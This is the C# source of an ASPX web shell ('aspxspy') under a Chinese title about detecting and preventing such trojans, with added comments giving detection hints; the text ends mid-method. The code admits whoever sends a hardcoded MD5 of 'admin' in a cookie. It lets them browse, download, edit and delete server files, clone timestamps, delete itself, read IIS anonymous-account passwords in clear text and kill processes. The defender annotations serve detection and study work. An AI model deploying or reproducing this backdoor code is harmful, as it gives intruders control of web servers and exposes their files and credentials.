aspx超强木马查杀与防范(web网马)
<%@ page language="c#" debug="true" trace="false" validaterequest="false" enableviewstatemac="false" enableviewstate="true"%>
<%@ import namespace="system.io"%>
<%@ import namespace="system.diagnostics"%>
<%@ import namespace="system.data"%>
<%@ import namespace="system.management"%>
<%@ import namespace="system.data.oledb"%>
<%@ import namespace="microsoft.win32"%>
<%@ import namespace="system.net.sockets" %>
<%@ import namespace="system.net" %>
<%@ import namespace="system.runtime.interopservices"%>
<%@ import namespace="system.directoryservices"%>
<%@ import namespace="system.serviceprocess"%>
<%@ import namespace="system.text.regularexpressions"%>
<%@ import namespace="system.threading"%>
<%@ import namespace="system.data.sqlclient"%>
<%@ import namespace="microsoft.visualbasic"%>
<%@ assembly name="system.directoryservices,version=2.0.0.0,culture=neutral,publickeytoken=b03f5f7f11d50a3a"%>
<%@ assembly name="system.management,version=2.0.0.0,culture=neutral,publickeytoken=b03f5f7f11d50a3a"%>
<%@ assembly name="system.serviceprocess,version=2.0.0.0,culture=neutral,publickeytoken=b03f5f7f11d50a3a"%>
<%@ assembly name="microsoft.visualbasic,version=7.0.3300.0,culture=neutral,publickeytoken=b03f5f7f11d50a3a"%>
<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<script runat="server">
// NOTE(review): identifiers in this listing are case-folded (e.g. oledbconnection, tcpclient), so it is not compilable C# as printed.
// Defender note: the page directive at the top of this file sets validaterequest="false" and enableviewstatemac="false",
// i.e. ASP.NET request validation and ViewState MAC checking are switched off for this page; together with the long list of
// system.management / system.directoryservices / system.serviceprocess / microsoft.win32 imports in a single .aspx file,
// that combination is a useful static-scan heuristic.
// Access secret for the panel: a 32-hex-digit MD5-style digest; the author's trailing note says it corresponds to "admin".
// Defender note: pdo() compares this exact string with a cookie value, so the digest itself can be hunted for in Cookie headers in web/proxy logs.
public string password="21232f297a57a5a743894a0e4a801fc3";//admin
// Name of the cookie that carries the access secret (read in pdo(), reset in ykpi()).
public string vbhln="aspxspy";
// Counter incremented by okm() to alternate the table-row CSS class.
public int tdggu=1;
// Shared OLE DB connection and command used by the database helpers (ouj, fuze, cyue, bin_data, jiaku).
protected oledbconnection dtdr=new oledbconnection();
protected oledbcommand kkvb=new oledbcommand();
// Streams and TCP clients used by ldodr() for its two connections.
public networkstream ns=null;
public networkstream ns1=null;
tcpclient tcp=new tcpclient();
tcpclient zvxm=new tcpclient();
// Not referenced anywhere in the visible part of the file.
arraylist ivc=new arraylist();
// Page entry point. Runs the cookie check (pdo) and, on postback, dispatches on the posted
// "__eventtarget" value, passing the posted "__file" value as the argument.
// Defender note: every action of this page is therefore a POST to the same .aspx URL whose form body
// carries "__eventtarget" (an action name from the switch below) and "__file" (often a base64 string,
// decoded by ebgw). Those two field names and the action names are the request-side indicators to look
// for in WAF / request-body logs.
protected void page_load(object sender,eventargs e)
{
// yfcnp is defined outside the visible part of the file; its effect cannot be told from here.
yfcnp(this);
// Builds the drive links before the auth check, so it runs for unauthenticated requests too.
fhaen();
// Stop here (login view already shown by pdo) when the cookie check fails.
if (!pdo())
{
return;
}
if(ispostback)
{
string tki=request["__eventtarget"];
string vqv=request["__file"];
if(tki!="")
{
// Fixed action names. Where the argument is wrapped in ebgw(), it is expected base64-encoded.
switch(tki)
{
// List a directory (parent link and folder link share the same handler).
case "bin_parent":
krir(ebgw(vqv));
break;
case "bin_listdir":
krir(ebgw(vqv));
break;
// Recursive directory delete.
case "krxgt":
krxgt(ebgw(vqv));
break;
// Open the create/edit-file view.
case "bin_createfile":
glkc(vqv);
break;
case "bin_editfile":
glkc(vqv);
break;
// Create a directory under the current one.
case "bin_createdir":
stnpw(vqv);
break;
// Open the file attribute / timestamp view.
case "cyal":
cyal(vqv);
break;
// Download a file.
case "ksgr":
ksgr(ebgw(vqv));
break;
// Delete the selected files.
case "sjv":
sjv(vqv);
break;
// Read a registry key.
case "bin_regread":
tprq(ebgw(vqv));
break;
// Delete this page's own file.
case "hae":
hae();
break;
// Terminate a process by id.
case "urjg":
urjg(vqv);
break;
}
// Prefixed action names: the text after the prefix is the base64 source path, "__file" is the destination.
if(tki.startswith("dajtd"))
{
// Rename/move a directory.
dajtd(ebgw(tki.replace("dajtd","")),vqv);
}
else if(tki.startswith("tlvz"))
{
// Rename/move a file.
tlvz(ebgw(tki.replace("tlvz","")),vqv);
}
else if(tki.startswith("bin_cfile"))
{
// Copy a file.
ybyn(ebgw(tki.replace("bin_cfile","")),vqv);
}
}
}
else
{
// First (non-postback) authenticated request: show the main panel.
pbzw();
}
}
// Authentication gate: returns true only when the cookie named by vbhln exists and its value equals
// the password field; otherwise it calls tzsx() and returns false.
// Defender note: the cookie is compared with the stored digest string itself, so any request that
// passes this check carries that digest in its Cookie header under the name held in vbhln.
public bool pdo()
{
if(request.cookies[vbhln]==null)
{
tzsx();
return false;
}
else
{
if (request.cookies[vbhln].value != password)
{
tzsx();
return false;
}
else
{
return true;
}
}
}
// Switches the page to its unauthenticated state: shows control ljtzc and hides control zvs.
// NOTE(review): both controls are declared in markup outside the visible part of the file;
// presumably ljtzc is the login form and zvs the main panel, since pdo() calls this on a failed check.
public void tzsx()
{
ljtzc.visible=true;
zvs.visible=false;
}
// Event handler that ends the operator's session: abandons the ASP.NET session, sends back the
// auth cookie (name in vbhln) with a null value, and switches to the unauthenticated view.
protected void ykpi(object sender,eventargs e)
{
session.abandon();
response.cookies.add(new httpcookie(vbhln,null));
tzsx();
}
// Shows the main panel after a successful cookie check and lists the starting directory.
// It wires client-side prompts onto three buttons, prints the server address, port, host name and
// .NET framework version, and defaults the current directory (axsbb) to the folder of this page.
public void pbzw()
{
zvs.visible=true;
ljtzc.visible=false;
// Each onclick script collects a name and posts back through the page's bin_postback() script function.
bin_button_createfile.attributes["onclick"]="var filename=prompt('please input the file name:','');if(filename){bin_postback('bin_createfile',filename);}";
bin_button_createdir.attributes["onclick"]="var filename=prompt('please input the directory name:','');if(filename){bin_postback('bin_createdir',filename);}";
// Confirmation text reads "Really self-delete?"; the postback target 'hae' deletes this page's own file.
bin_button_killme.attributes["onclick"]="if(confirm('确定要自杀?')){bin_postback('hae','');};";
bin_span_sname.innerhtml=request.servervariables["local_addr"]+":"+request.servervariables["server_port"]+"("+request.servervariables["server_name"]+")";
bin_span_frameversion.innerhtml="framework ver : "+environment.version.tostring();
// No current directory yet: start in the physical folder this page is served from.
if (axsbb.value==string.empty)
{
axsbb.value=oelm(server.mappath("."));
}
// Heading reads "File (folder) management >>".
bin_h2_title.innertext="文件(夹)管理 >>";
krir(axsbb.value);
}
// Enumerates the server's logical drives and adds one link button per drive to bin_span_drv.
// Each button's text is the drive-type label from mfvj() and its command argument is the drive root;
// the command handler ivk is defined outside the visible part of the file.
// Any exception is silently discarded.
public void fhaen()
{
try
{
string[] yrgt=directory.getlogicaldrives();
for(int i=0;i<yrgt.length;i++)
{
// The control is created from a markup string at run time, then looked up by id to attach the handler.
control c=parsecontrol(" <asp:linkbutton text='"+mfvj(yrgt[i])+"' id=\"bin_button_driv"+i+"\" runat='server' commandargument= '"+yrgt[i]+"'/> | ");
bin_span_drv.controls.add(c);
linkbutton nxedr=(linkbutton)page.findcontrol("bin_button_driv"+i);
nxedr.command+=new commandeventhandler(this.ivk);
}
}catch(exception ex){}
}
// Returns path with a trailing backslash, appending one when the last character is not already "\".
// NOTE(review): the substring call reads the last character, so an empty path would presumably throw — confirm against callers.
public string oelm(string path)
{
if(path.substring(path.length-1,1)!=@"\")
{
path=path+@"\";
}
return path;
}
// Returns path with trailing backslashes removed when its last character is "\"; otherwise returns it unchanged.
public string nrrx(string path)
{
char[] trim={'\\'};
if(path.substring(path.length-1,1)==@"\")
{
path=path.trimend(trim);
}
return path;
}
// P/Invoke binding to the ANSI GetDriveType entry point in kernel32.dll; takes a drive root and
// returns the numeric drive-type code that mfvj() turns into a label.
// Defender note: a web page declaring native kernel32 imports is unusual for application code and
// can be flagged by static scanning of .aspx files.
[dllimport("kernel32.dll",entrypoint="getdrivetypea")]
public static extern int omzp(string ndrive);
// Builds the display label for a drive: "<type>(<drive>)" with backslashes removed.
// The type comes from the drive-type code returned by omzp(); codes outside 1..6 leave the label empty.
public string mfvj(string instr)
{
string euxd=string.empty;
int num=omzp(instr);
switch(num)
{
case 1:
euxd="unknow("+instr+")";
break;
case 2:
euxd="removable("+instr+")";
break;
// Label text means "disk".
case 3:
euxd="磁盘("+instr+")";
break;
case 4:
euxd="network("+instr+")";
break;
case 5:
euxd="cdrom("+instr+")";
break;
case 6:
euxd="ram disk("+instr+")";
break;
}
return euxd.replace(@"\","");
}
// Base64-encodes a string after converting it to bytes with the system default encoding.
// Used throughout the page to embed paths and key names in postback links.
public string mvvj(string instr)
{
byte[] tmp=encoding.default.getbytes(instr);
return convert.tobase64string(tmp);
}
// Inverse of mvvj(): base64-decodes a string and interprets the bytes with the system default encoding.
// Defender note: because request arguments pass through this function, file paths and registry keys in
// captured "__file" / "__eventtarget" values are base64 text and need decoding before log searches match them.
public string ebgw(string instr)
{
byte[] tmp=convert.frombase64string(instr);
return encoding.default.getstring(tmp);
}
// Renders the file-manager view for one directory into table ugzp and makes it the current directory (axsbb).
// Output, in order: an optional "parent directory" row, one row per sub-directory, a separator row,
// one row per file, and a footer row with select-all / delete-selected controls and the counts.
// Every action link posts back through bin_postback() with the target path base64-encoded by mvvj().
// Errors while enumerating are reported through xseub() (defined outside the visible part of the file).
public void krir(string path)
{
// wicxe is defined outside the visible part of the file; presumably it hides the other views — confirm.
wicxe();
czfo.visible=true;
// Heading reads "File (folder) management >>".
bin_h2_title.innertext="文件(夹)管理 >>";
axsbb.value=oelm(path);
directoryinfo gqmm=new directoryinfo(path);
// Only offer the parent link when the directory is not a drive root.
if(directory.getparent(nrrx(path))!=null)
{
string bg=okm();
tablerow p=new tablerow();
for(int i=1;i<6;i++)
{
tablecell pc=new tablecell();
if(i==1)
{
pc.width=unit.parse("2%");
pc.text="<font face='wingdings' size='4'>0</font>";
p.cssclass=bg;
}
if(i==2)
{
pc.text="<a href=\"javascript:bin_postback('bin_parent','"+mvvj(directory.getparent(nrrx(path)).tostring())+"')\">parent directory</a>";
}
p.cells.add(pc);
ugzp.rows.add(p);
}
}
try
{
// vllh counts sub-directories for the footer.
int vllh=0;
foreach(directoryinfo bin_folder in gqmm.getdirectories())
{
string bg=okm();
vllh++;
tablerow tr=new tablerow();
tablecell tc=new tablecell();
tc.width=unit.parse("2%");
tc.text="<font face='wingdings' size='4'>0</font>";
tr.attributes["onmouseover"]="this.classname='focus';";
tr.cssclass=bg;
tr.attributes["onmouseout"]="this.classname='"+bg+"';";
tr.cells.add(tc);
// Folder name links to a listing of that folder.
tablecell hczyn=new tablecell();
hczyn.text="<a href=\"javascript:bin_postback('bin_listdir','"+mvvj(axsbb.value+bin_folder.name)+"')\">"+bin_folder.name+"</a>";
tr.cells.add(hczyn);
tablecell lyzk=new tablecell();
lyzk.text=bin_folder.lastwritetimeutc.tostring("yyyy-mm-dd hh:mm:ss");
tr.cells.add(lyzk);
ugzp.rows.add(tr);
// Size column is not computed for directories.
tablecell erul=new tablecell();
erul.text="--";
tr.cells.add(erul);
ugzp.rows.add(tr);
// Action column: "delete" (with a confirmation reading "Really delete this file/folder?") and
// "rename" (prompt reads "Please enter the folder name").
tablecell zgkh=new tablecell();
zgkh.text="<a href=\"javascript:if(confirm('确定要删除此文件(夹) ?')){bin_postback('krxgt','"+mvvj(axsbb.value+bin_folder.name)+"')};\">删除</a> | <a href='#' onclick=\"var filename=prompt('请输入文件夹名称:','"+axsbb.value.replace(@"\",@"\\")+bin_folder.name.replace("'","\\'")+"');if(filename){bin_postback('dajtd"+mvvj(axsbb.value+bin_folder.name)+"',filename);} \">重命名</a>";
tr.cells.add(zgkh);
ugzp.rows.add(tr);
}
// Thin separator row between the directory rows and the file rows.
tablerow ckva=new tablerow();
ckva.attributes["style"]="border-top:1px solid #fff;border-bottom:1px solid #ddd;";
ckva.attributes["bgcolor"]="#dddddd";
tablecell jlmw=new tablecell();
jlmw.attributes["colspan"]="6" ;
jlmw.attributes["height"]="5";
ckva.cells.add(jlmw);
ugzp.rows.add(ckva);
// ayrwo counts files for the footer.
int ayrwo=0;
foreach(fileinfo bin_files in gqmm.getfiles())
{
ayrwo++;
string gb=okm();
tablerow tr=new tablerow();
tablecell tc=new tablecell();
tc.width=unit.parse("2%");
// Checkbox name is the base64 file name; the delete-selected script collects these names.
tc.text="<input type=\"checkbox\" value=\"0\" name=\""+mvvj(bin_files.name)+"\">";
tr.attributes["onmouseover"]="this.classname='focus';";
tr.cssclass=gb;
tr.attributes["onmouseout"]="this.classname='"+gb+"';";
tr.cells.add(tc);
tablecell filename=new tablecell();
// Files under the web application's physical root get a direct URL built from the request URL.
if(bin_files.fullname.startswith(request.physicalapplicationpath))
{
string url=request.url.tostring();
filename.text="<a href=\""+bin_files.fullname.replace(request.physicalapplicationpath,url.substring(0,url.indexof('/',8)+1)).replace("\\","/")+"\" target=\"_blank\">"+bin_files.name+"</a>";
}
else
{
filename.text=bin_files.name;
}
tablecell albt=new tablecell();
albt.text=bin_files.lastwritetimeutc.tostring("yyyy-mm-dd hh:mm:ss");
tablecell yzk=new tablecell();
yzk.text=mtg(bin_files.length);
// Action column, in order: download, copy, edit, rename, change file attributes.
// Prompts read "Please enter the new file name".
tablecell glpi=new tablecell();
glpi.text="<a href=\"#\" onclick=\"bin_postback('ksgr','"+mvvj(axsbb.value+bin_files.name)+"')\">下载</a> | <a href='#' onclick=\"var filename=prompt('请输入新的文件名:','"+axsbb.value.replace(@"\",@"\\")+bin_files.name.replace("'","\\'")+"');if(filename){bin_postback('bin_cfile"+mvvj(axsbb.value+bin_files.name)+"',filename);} \">复制</a> | <a href=\"#\" onclick=\"bin_postback('bin_editfile','"+bin_files.name+"')\">编辑</a> | <a href='#' onclick=\"var filename=prompt('请输入新的文件名:','"+axsbb.value.replace(@"\",@"\\")+bin_files.name.replace("'","\\'")+"');if(filename){bin_postback('tlvz"+mvvj(axsbb.value+bin_files.name)+"',filename);} \">重命名</a> | <a href=\"#\" onclick=\"bin_postback('cyal','"+bin_files.name+"')\">修改文件属性</a> ";
tr.cells.add(filename);
tr.cells.add(albt);
tr.cells.add(yzk);
tr.cells.add(glpi);
ugzp.rows.add(tr);
}
// Footer row: select-all checkbox, "delete selected" link, and "<n> folders / <m> files".
string lgb=okm();
tablerow owam=new tablerow();
owam.cssclass=lgb;
for(int i=1;i<4;i++)
{
tablecell lgv=new tablecell();
if(i==1)
{
lgv.text="<input name=\"chkall\" value=\"on\" type=\"checkbox\" onclick=\"var ck=document.getelementsbytagname('input');for(var i=0;i<ck.length-1;i++){if(ck[i].type=='checkbox'&&ck[i].name!='chkall'){ck[i].checked=forms[0].chkall.checked;}}\"/>";
}
if(i==2)
{
// The script joins the checked names with a trailing comma and posts them to the 'sjv' action.
lgv.text="<a href=\"#\" onclick=\"var d_file='';var ck=document.getelementsbytagname('input');for(var i=0;i<ck.length-1;i++){if(ck[i].checked&&ck[i].name!='chkall'){d_file+=ck[i].name+',';}};if(d_file==null || d_file==''){ return;} else {if(confirm('are you sure delete the files ?')){bin_postback('sjv',d_file)};}\">delete selected</a>";
}
if(i==3)
{
lgv.columnspan=4;
lgv.style.add("text-align","right");
lgv.text=vllh+" 文件夹/ "+ayrwo+" 文件";
}
owam.cells.add(lgv);
}
ugzp.rows.add(owam);
}
catch(exception error)
{
xseub(error.message);
}
}
// Returns the CSS class for the next table row, alternating "alt1" / "alt2" on each call
// by incrementing the tdggu counter and testing its parity.
public string okm()
{
tdggu++;
if(tdggu % 2==0)
{
return "alt1";
}
else
{
return "alt2";
}
}
// Deletes directory qcku together with everything beneath it (recursive flag is true), reports the
// outcome through xseub(), then lists the parent directory.
// Defender note: this runs with the worker process identity, so tight NTFS write/delete permissions
// for that identity outside the content it must modify limit what this action can remove.
public void krxgt(string qcku)
{
try
{
directory.delete(qcku,true);
xseub("directory delete new success !");
}
catch(exception error)
{
xseub(error.message);
}
krir(directory.getparent(qcku).tostring());
}
// Moves/renames directory sdir to ddir, reports the outcome through xseub(), then re-lists the current directory.
public void dajtd(string sdir,string ddir)
{
try
{
directory.move(sdir,ddir);
xseub("directory renamed success !");
}
catch(exception error)
{
xseub(error.message);
}
krir(axsbb.value);
}
// Moves/renames file sfile to dfile, reports the outcome through xseub(), then re-lists the current directory.
public void tlvz(string sfile,string dfile)
{
try
{
file.move(sfile,dfile);
xseub("file renamed success !");
}
catch(exception error)
{
xseub(error.message);
}
krir(axsbb.value);
}
// Copies file spath to dpath, reports the outcome through xseub(), then re-lists the current directory.
public void ybyn(string spath,string dpath)
{
try
{
file.copy(spath,dpath);
xseub("file copy success !");
}
catch(exception error)
{
xseub(error.message);
}
krir(axsbb.value);
}
// Creates a directory named path under the current directory (axsbb), reports the outcome through
// xseub(), then re-lists the current directory.
public void stnpw(string path)
{
try
{
directory.createdirectory(axsbb.value+path);
xseub("directory created success !");
}
catch(exception error)
{
xseub(error.message);
}
krir(axsbb.value);
}
// Opens the create/edit-file view (heading reads "Create/edit file >>") for path.
// A path without ":" is treated as relative to the current directory; the resolved path is stored in sqon.
// If the file exists, its text is loaded into the editor control xgvv using UTF-8 or the system default
// encoding, depending on the selection in list ndcx; otherwise the editor starts empty.
// NOTE(review): the handler that writes the edited text back to disk is not in the visible part of the file.
// Defender note: reading arbitrary files into the response is how configuration files and their
// credentials get exposed once a page like this is reachable.
public void glkc(string path)
{
if(request["__eventtarget"]=="bin_editfile" || request["__eventtarget"]=="bin_createfile")
{
foreach(listitem item in ndcx.items)
{
if(item.selected=true)
{
item.selected=false;
}
}
}
bin_h2_title.innerhtml="创建/编辑文件 >>";
wicxe();
vrfa.visible=true;
if(path.indexof(":")< 0)
{
sqon.value=axsbb.value+path;
}
else
{
sqon.value=path;
}
if(file.exists(sqon.value))
{
streamreader sr;
if(ndcx.selecteditem.text=="utf-8")
{
sr=new streamreader(sqon.value,encoding.utf8);
}
else
{
sr=new streamreader(sqon.value,encoding.default);
}
xgvv.innertext=sr.readtoend();
sr.close();
}
else
{
xgvv.innertext=string.empty;
}
}
// Sends the file at path to the client as a download: clears the response, sets a content-disposition
// "attachment" header with the URL-encoded file name, a content-length header and content type
// "application/unknown", writes the file and ends the response.
// Defender note: an .aspx URL answering a POST with an attachment and this content type, with a body
// size matching a file on disk, is a data-staging/exfiltration signal worth alerting on in proxy logs.
public void ksgr(string path)
{
fileinfo fs=new fileinfo(path);
response.clear();
page.response.clearheaders();
page.response.buffer=false;
this.enableviewstate=false;
response.addheader("content-disposition","attachment;filename="+httputility.urlencode(fs.name,system.text.encoding.utf8));
response.addheader("content-length",fs.length.tostring());
page.response.contenttype="application/unknown";
response.writefile(fs.fullname);
page.response.flush();
page.response.close();
response.end();
page.response.clear();
}
// Deletes several files from the current directory. path is a comma-separated list of base64 file
// names with a trailing comma (as built by the delete-selected script in krir), which is why the loop
// stops one element short of the split result. Reports the outcome through xseub() and re-lists the directory.
public void sjv(string path)
{
try
{
string[] spdt=path.split(',');
for(int i=0;i<spdt.length-1;i++)
{
file.delete(axsbb.value+ebgw(spdt[i]));
}
xseub("file delete success !");
}
catch(exception error)
{
xseub(error.message);
}
krir(axsbb.value);
}
// Deletes the physical file of the page currently being requested, i.e. this page removes itself.
// Defender note: the absence of the file on disk is therefore not evidence that the server was never
// affected; rely on web logs, file-system journals and backups rather than on a directory scan alone.
public void hae()
{
try
{
file.delete(request.physicalpath);
}
catch(exception error)
{
xseub(error.message);
}
}
// Opens the attribute/timestamp view for a file in the current directory (heading reads
// "Clone a file's last-modified time >>"). It fills the form with the file path, ticks the
// read-only / system / hidden / archive boxes from the file's attributes, and shows its UTC
// creation, last-write and last-access times.
// NOTE(review): the handler that applies changed attributes or timestamps is not in the visible part of the file.
// Defender note: the heading indicates a timestamp-cloning feature, so on a host where this page was
// present, file modification times should not be trusted as evidence on their own.
public void cyal(string path)
{
bin_h2_title.innerhtml="克隆文件的最后修改时间 >>";
wicxe();
zryg.visible=true;
qifb.value=axsbb.value+path;
licp.value=axsbb.value;
pwvl.value=axsbb.value+path;
// The attribute flags are tested by searching the flags' string form for each name.
string att=file.getattributes(qifb.value).tostring();
if(att.lastindexof("readonly")!=-1)
{
zhwsk.checked=true;
}
if(att.lastindexof("system")!=-1)
{
ssr.checked=true;
}
if(att.lastindexof("hidden")!=-1)
{
ccb.checked=true;
}
if(att.lastindexof("archive")!=-1)
{
fbyz.checked=true;
}
yuqx.value=file.getcreationtimeutc(pwvl.value).tostring();
uyjw.value=file.getlastwritetimeutc(pwvl.value).tostring();
alsn.value=file.getlastaccesstimeutc(pwvl.value).tostring();
}
// Formats a byte count for display using 1024-based steps: "g" from 1024^3, "m" from 1024^2,
// "k" from 1024, otherwise the plain number followed by " b".
// Throws an argument-out-of-range exception for a negative size.
public static string mtg(int64 filesize)
{
if(filesize<0)
{
throw new argumentoutofrangeexception("filesize");
}
else if(filesize >= 1024 * 1024 * 1024)
{
return string.format("{0:########0.00} g",((double)filesize)/(1024 * 1024 * 1024));
}
else if(filesize >= 1024 * 1024)
{
return string.format("{0:####0.00} m",((double)filesize)/(1024 * 1024));
}
else if(filesize >= 1024)
{
return string.format("{0:####0.00} k",((double)filesize)/ 1024);
}
else
{
return string.format("{0} b",filesize);
}
}
// Returns whether ssrc matches the digit pattern below. adcx() uses it to pick the IIS metabase
// children whose names are site numbers.
private bool sgde(string ssrc)
{
regex reg=new regex(@"^0|[0-9]*[1-9][0-9]*$");
if(reg.ismatch(ssrc))
{
return true;
}
else
{
return false;
}
}
// Enumerates the web sites in the local IIS metabase ("iis://localhost/w3svc") and adds one table row
// per site to gli with: a running number, the site's anonymous user name, the anonymous user's
// password, the server bindings, and a link that lists the site's root path in the file manager.
// Per-cell and overall errors are reported through xseub().
// Defender note: the anonymoususerpass property is read in clear text, so after an incident the IIS
// anonymous account passwords should be treated as disclosed. Whether this call succeeds depends on the
// worker process identity having metabase read access; keeping that identity unprivileged limits it.
public void adcx()
{
string qcku=string.empty;
string mwgem="iis://localhost/w3svc";
gli.style.add("word-break","break-all");
try
{
directoryentry hhzcy=new directoryentry(mwgem);
int fmw=0;
foreach(directoryentry child in hhzcy.children)
{
// Only children accepted by sgde() (numeric names) are treated as sites.
if(sgde(child.name.tostring()))
{
fmw++;
directoryentry newdir=new directoryentry(mwgem+"/"+child.name.tostring());
directoryentry hlyu=newdir.children.find("root","iiswebvirtualdir");
string bg=okm();
tablerow tr=new tablerow();
tr.attributes["onmouseover"]="this.classname='focus';";
tr.cssclass=bg;
tr.attributes["onmouseout"]="this.classname='"+bg+"';";
tr.attributes["title"]="site:"+child.properties["servercomment"].value.tostring();
for(int i=1;i<6;i++)
{
try
{
tablecell tfit=new tablecell();
switch(i)
{case 1:
tfit.text=fmw.tostring();
break;
case 2:
tfit.text=hlyu.properties["anonymoususername"].value.tostring();
break;
case 3:
tfit.text=hlyu.properties["anonymoususerpass"].value.tostring();
break;
case 4:
// Bindings are joined with "<br>" and the final "<br>" is cut off.
stringbuilder sb=new stringbuilder();
propertyvaluecollection pc=child.properties["serverbindings"];
for (int j=0; j < pc.count; j++)
{
sb.append(pc[j].tostring()+"<br>");
}
tfit.text=sb.tostring().substring(0,sb.tostring().length-4);
break;
case 5:
tfit.text="<a href=\"javascript:bin_postback('bin_listdir','"+mvvj(hlyu.properties["path"].value.tostring())+"')\">"+hlyu.properties["path"].value.tostring()+"</a>";
break;
}
tr.cells.add(tfit);
}
catch (exception ex)
{
xseub(ex.message);
continue;
}
}
gli.controls.add(tr);
}
}
}
catch(exception ex)
{
xseub(ex.message);
}
}
// Runs a WMI select query and returns the resulting object collection. Used by urjg() to find a process by id.
public managementobjectcollection phqtd(string query)
{
managementobjectsearcher qs=new managementobjectsearcher(new selectquery(query));
return qs.get();
}
// Runs a WMI select query (callers pass a class name such as "win32_process") and flattens the result
// into a data table: one column per property name seen, one row per object, every value stored as a
// string and missing values stored as the empty string. Any exception is silently discarded and the
// rows collected so far are returned.
// Defender note: WMI queries issued from the web worker process are uncommon for ordinary sites and
// can be surfaced through WMI activity logging on the host.
public datatable ccf(string query)
{
datatable dt=new datatable();
int i=0;
managementobjectsearcher qs=new managementobjectsearcher(new selectquery(query));
try
{
foreach(managementobject m in qs.get())
{
datarow dr=dt.newrow();
propertydatacollection.propertydataenumerator oenum;
oenum=(m.properties.getenumerator()as propertydatacollection.propertydataenumerator);
while(oenum.movenext())
{
propertydata dru=(propertydata)oenum.current;
// Add the column the first time a property name is seen.
if(dt.columns.indexof(dru.name)==-1)
{
dt.columns.add(dru.name);
dt.columns[dt.columns.count-1].defaultvalue="";
}
if(m[dru.name]!=null)
{
dr[dru.name]=m[dru.name].tostring();
}
else
{
dr[dru.name]=string.empty;
}
}
dt.rows.add(dr);
}
}
catch(exception error)
{
}
return dt;
}
// Shows the process view (heading reads "System processes >>") using the .NET process list: one row
// per process with a running number, process id, name, thread count, base priority and "--".
// aiz() (the WMI-based listing) is called when an exception occurs and is also called unconditionally
// after the try block.
public void yuw()
{
try
{
bin_h2_title.innertext="系统进程 >>";
wicxe();
dcbs.visible=true;
int uebti=0;
process[] p=process.getprocesses();
foreach(process sp in p)
{
uebti++;
string bg=okm();
tablerow tr=new tablerow();
tr.attributes["onmouseover"]="this.classname='focus';";
tr.cssclass=bg;
tr.attributes["onmouseout"]="this.classname='"+bg+"';";
for(int i=1;i<7;i++)
{
tablecell td=new tablecell();
if(i==1)
{
td.width=unit.parse("2%");
td.text=uebti.tostring();
tr.controls.add(td);
}
if(i==2)
{
td.text=sp.id.tostring();
tr.controls.add(td);
}
if(i==3)
{
td.text=sp.processname.tostring();
tr.controls.add(td);
}
if(i==4)
{
td.text=sp.threads.count.tostring();
tr.controls.add(td);
}
if(i==5)
{
td.text=sp.basepriority.tostring();
tr.controls.add(td);
}
if(i==6)
{
td.text="--";
tr.controls.add(td);
}
}
ijsl.controls.add(tr);
}
}
catch(exception error)
{
aiz();
}
aiz();
}
// Shows the process view (heading reads "System processes >>") from WMI class win32_process: one row
// per process with a running number, process id, name, thread count and priority. The last column is
// a "kill" link posting the process id to the 'urjg' action when the commandline value is not the
// empty string, otherwise "--". Errors are reported through xseub().
public void aiz()
{
try
{
bin_h2_title.innertext="系统进程 >>";
wicxe();
dcbs.visible=true;
int uebti=0;
datatable dt=ccf("win32_process");
for(int j=0;j<dt.rows.count;j++)
{
uebti++;
string bg=okm();
tablerow tr=new tablerow();
tr.attributes["onmouseover"]="this.classname='focus';";
tr.cssclass=bg;
tr.attributes["onmouseout"]="this.classname='"+bg+"';";
for(int i=1;i<7;i++)
{
tablecell td=new tablecell();
if(i==1)
{
td.width=unit.parse("2%");
td.text=uebti.tostring();
tr.controls.add(td);
}
if(i==2)
{
td.text=dt.rows[j]["processid"].tostring();
tr.controls.add(td);
}
if(i==3)
{
td.text=dt.rows[j]["name"].tostring();
tr.controls.add(td);
}
if(i==4)
{
td.text=dt.rows[j]["threadcount"].tostring();
tr.controls.add(td);
}
if(i==5)
{
td.text=dt.rows[j]["priority"].tostring();
tr.controls.add(td);
}
if(i==6)
{
if( dt.rows[j]["commandline"]!=string.empty)
{
td.text="<a href=\"javascript:bin_postback('urjg','"+dt.rows[j]["processid"].tostring()+"')\">kill</a>";
}
else
{
td.text="--";
}
tr.controls.add(td);
}
}
ijsl.controls.add(tr);
}
}
catch(exception error)
{
xseub(error.message);
}
}
// Terminates the process whose id is pid by selecting it from win32_process over WMI and invoking the
// object's "terminate" method, reports the outcome through xseub(), then refreshes the process list.
// pid arrives unmodified from the posted "__file" value (see page_load) and is concatenated into the query text.
// Defender note: a process termination whose caller is the web worker process is a strong host-side
// signal; it can only succeed against processes the worker identity is allowed to terminate.
public void urjg(string pid)
{
try
{
foreach(managementobject p in phqtd("select * from win32_process where processid ='"+pid+"'"))
{
p.invokemethod("terminate",null);
p.dispose();
}
xseub("process kill success !");
}
catch(exception error)
{
xseub(error.message);
}
aiz();
}
// Shows the services view (heading reads "System services >>") from the .NET service controller list:
// one row per service with a running number, the literal "null", the service name, an empty cell,
// the status (green when "running", red otherwise) and an empty cell. Errors go to xseub().
// tzrh() falls back to this method when its WMI-based listing fails.
public void ohpf()
{
try
{
bin_h2_title.innertext="系统服务 >>";
wicxe();
iqxm.visible=true;
int uebti=0;
servicecontroller[] kqmru=system.serviceprocess.servicecontroller.getservices();
for(int i=0;i<kqmru.length;i++)
{
uebti++;
string bg=okm();
tablerow tr=new tablerow();
tr.attributes["onmouseover"]="this.classname='focus';";
tr.cssclass=bg;
tr.attributes["onmouseout"]="this.classname='"+bg+"';";
for(int b=1;b<7;b++)
{
tablecell td=new tablecell();
if(b==1)
{
td.width=unit.parse("2%");
td.text=uebti.tostring();
tr.controls.add(td);
}
if(b==2)
{
td.text="null";
tr.controls.add(td);
}
if(b==3)
{
td.text=kqmru[i].servicename.tostring();
tr.controls.add(td);
}
if(b==4)
{
td.text="";
tr.controls.add(td);
}
if(b==5)
{
string koio=kqmru[i].status.tostring();
if(koio=="running")
{
td.text="<font color=green>"+koio+"</font>";
}
else
{
td.text="<font color=red>"+koio+"</font>";
}
tr.controls.add(td);
}
if(b==6)
{
td.text="";
tr.controls.add(td);
}
}
vhcs.controls.add(tr);
}
}
catch(exception error)
{
xseub(error.message);
}
}
// Shows the services view (heading reads "System services >>") from WMI class win32_service: one row
// per service with a running number, process id, name, executable path, state (green when "running",
// red otherwise) and start mode; the service description becomes the row tooltip.
// On any exception it falls back to ohpf().
// Defender note: the executable-path column gives a viewer the service binaries' locations, which is
// typical reconnaissance output; service binary directories should not be writable by the web identity.
public void tzrh()
{
try
